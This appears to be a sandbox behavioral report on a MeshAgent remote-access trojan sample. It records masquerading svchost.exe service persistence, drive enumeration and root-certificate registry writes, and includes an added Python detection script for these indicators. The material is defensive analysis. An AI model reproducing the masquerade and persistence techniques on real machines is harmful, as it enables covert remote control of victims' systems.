MeshAgent

rat trojan backdoor meshagent

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Microsoft\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\svchost\\svchost.exe\" --meshServiceName=\"Microsoft\"" C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
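Detection logic for the two registry writes this report records, added here as an example and not taken from the report or the sandbox vendor: the service ImagePath above (a binary named svchost.exe under the user's profile, registered as a service called "Microsoft" with a MeshAgent --meshServiceName argument) and the root-store certificate write under SystemCertificates\ROOT\Certificates in behavioral1. The input is a list of Sysmon-style registry value-set records constructed from those two writes plus two benign controls; the field names, the user-writable directory list and the masquerade name list are assumptions to tune for your estate.

```python
import re

# Heuristics (assumptions): directories a standard user can write to, where svchost.exe and
# friends legitimately live, and system binary names malware borrows to blend in.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
MASQUERADE_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "explorer.exe"}

IMAGEPATH_KEY = re.compile(r"\\Services\\([^\\]+)\\ImagePath$", re.I)
ROOT_CERT_KEY = re.compile(r"\\SystemCertificates\\ROOT\\Certificates\\([0-9A-F]{40})\\Blob$", re.I)
MESH_ARG = re.compile(r"--meshServiceName=", re.I)

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"
AGENT = r"C:\Users\Admin\AppData\Local\svchost\svchost.exe"
EVENTS = [  # constructed: the two writes from this report, then two benign controls
    {"proc": AGENT,
     "key": r"HKLM\SYSTEM\ControlSet001\Services\Microsoft\ImagePath",
     "value": '"' + AGENT + '" --meshServiceName="Microsoft"'},
    {"proc": SAMPLE,
     "key": r"HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob",
     "value": "<binary blob>"},
    {"proc": r"C:\Windows\System32\services.exe",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Services\Spooler\ImagePath",
     "value": r"C:\Windows\System32\spoolsv.exe"},
    {"proc": r"C:\Program Files\Vendor\setup.exe",
     "key": r"HKLM\SYSTEM\CurrentControlSet\Services\VendorSvc\ImagePath",
     "value": r'"C:\Program Files\Vendor\vendorsvc.exe" -service'},
]


def split_image_path(value):
    """Split a service ImagePath into (exe, args); handles quoted and unquoted forms."""
    v = value.strip()
    if v.startswith('"'):
        end = v.find('"', 1)
        return v[1:end], v[end + 1:].strip()
    m = re.search(r"\.exe\b", v, re.I)  # unquoted: the executable ends at the first .exe
    return (v[:m.end()], v[m.end():].strip()) if m else (v, "")


def check_registry_event(ev):
    """Return [(rule, detail), ...] for one registry value-set event."""
    alerts = []
    key, value, proc = ev["key"], ev["value"], ev["proc"]
    m = IMAGEPATH_KEY.search(key)
    if m:
        svc = m.group(1)
        exe, args = split_image_path(value)
        exe_l = exe.lower()
        if exe_l.startswith(USER_WRITABLE):
            alerts.append(("service_imagepath_user_writable", f"{svc} -> {exe}"))
        if exe_l.rsplit("\\", 1)[-1] in MASQUERADE_NAMES and not exe_l.startswith(SYSTEM_DIRS):
            alerts.append(("system_binary_name_outside_system32", exe))
        if MESH_ARG.search(args):
            alerts.append(("meshagent_service_args", f"{svc}: {args}"))
    m = ROOT_CERT_KEY.search(key)
    if m and not proc.lower().startswith("c:\\windows\\"):
        alerts.append(("root_ca_added_by_non_system_process", f"{m.group(1).upper()} by {proc}"))
    return alerts


def scan(events):
    """Flatten alerts over a list of events as (process, rule, detail)."""
    return [(ev["proc"], rule, detail) for ev in events for rule, detail in check_registry_event(ev)]


if __name__ == "__main__":
    for proc, rule, detail in scan(EVENTS):
        print(rule, "|", detail, "|", proc)
```

The same three service checks map directly onto a live host hunt (service ImagePath under a user profile, a svchost.exe that is not in System32, a --meshServiceName argument), and the certificate rule turns the thumbprint CABD2A79A1076A31F21D253635CB039D4329A5E8 into something you can match against the machine root store rather than just a registry key name.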

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\comctl32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\msvcrt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ucrtbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\gdiplus.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\kernel32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\user32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\msvcp_win.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ntasn1.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ntasn1.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ws2_32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32full.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\gdi32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\crypt32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\user32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\gdi32full.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\sechost.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\shell32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ncrypt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ws2_32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\crypt32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdi32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\dbghelp.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\shcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\exe\MeshService64.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\gdi32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ole32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\combase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\gdiplus.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dbgcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\bcrypt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\kernel32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BF332F71369E50D0A83473561526CDE3306995C5 C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\EC2C65D3BFBACE4745E3B186972B697BD8B5F46B C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\msvcp_win.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\sechost.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\combase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ncrypt.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\DLL\kernel32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\comctl32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\rpcrt4.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\shell32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dbghelp.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\ntdll.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\sechost.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\bcryptprimitives.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\B0B24DB435524A38C2DB25B18D0FD77582AA3B8C C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\advapi32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\crypt32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\ucrtbase.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\dll\user32.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\dbghelp.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\dll\gdiplus.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BF332F71369E50D0A83473561526CDE3306995C5 C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133735536335178670" C:\Users\Admin\AppData\Local\svchost\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
